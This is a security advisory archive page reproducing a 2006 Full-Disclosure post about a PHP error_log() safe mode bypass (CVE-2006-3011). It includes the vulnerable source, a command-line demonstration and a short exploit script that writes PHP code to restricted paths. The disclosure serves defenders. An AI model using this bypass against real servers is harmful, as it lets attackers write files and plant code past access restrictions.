Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
PHP error_log() Function Lets Users Bypass Safe Mode File Access Restrictions
|
|
SecurityTracker Alert ID: 1016377
|
|
SecurityTracker URL: http://securitytracker.com/id?1016377
|
|
CVE Reference: CVE-2006-3011
(Links to External Site)
|
Date: Jun 26 2006
|
Impact: Disclosure of system information, Disclosure of user information, Modification of user information
|
Exploit Included: Yes
|
Version(s): 4.4.2, 5.1.4
|
Description: A vulnerability was reported in PHP in the error_log() function. A user can bypass safe mode restrictions.
A user can supply specially crafted data to the PHP error_log() function to access files on the target system.
If the specified
filename does not exist, safe_mode will be disabled if a URL-type of prefix is used ('[prefix]://../../') instead of a pathname.
A
user with the privileges to load arbitrary PHP code or with the ability to specify the parameters of an error_log() function call
can exploit this vulnerability to read from or write to restricted files on the target system.
A demonstration exploit is provided:
<?php
$file="";
# FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>
The vendor was notified on June 11, 2006.
Maksymilian
Arciemowicz reported this vulnerability.
The original advisory is available at:
http://securityreason.com/achievement_securityalert/41
|
Impact: A user can bypass safe_mode restrictions.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.php.net/ (Links to External Site)
|
Cause: State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Maksymilian Arciemowicz <max@jestsuper.pl>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 26 Jun 2006 01:10:48 +0200
From: Maksymilian Arciemowicz <max@jestsuper.pl>
Subject: [Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
|
Source: http://securityreason.com/achievement_securityalert/41
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 10.6.2006
- -Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with
a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers to write dynamically generat
ed pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.p
hp on the Zend website. Also,
much of the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.
- --- 1. error_log() Safe Mode Bypass ---
error_log() function send to email, file or display your error message. You can send error messages p
er mail or write into files.
Issue is very simple. error_log() check safe_mode and open_basedir in stream function. But isn't all
owed use URL. And problem exists
in incorrect filename.
PHP5:
- -2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERROR
S, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
- -2013-2050---
Let's see to option 3.
- -2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS,
NULL);
- -2038 line---
Option "a", writte to file error or if file dosen't exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
IGNORE_URL turn off safe_mode if you use "prefix://../../".
- -Example---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php"
);'
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to a
ccess /www/temp owned by uid
80 in Command line code on line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on
line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp
/sr.php");'
cxib# ls -la /www/temp/sr.php
- -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
- -Example---
- --- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>
- --- 3. How to fix ---
No response from PHP Team. We have reported this bug in 11.06.2006
- --- 4. Greets ---
For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)
iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
Go to the Top of This SecurityTracker Archive Page
|
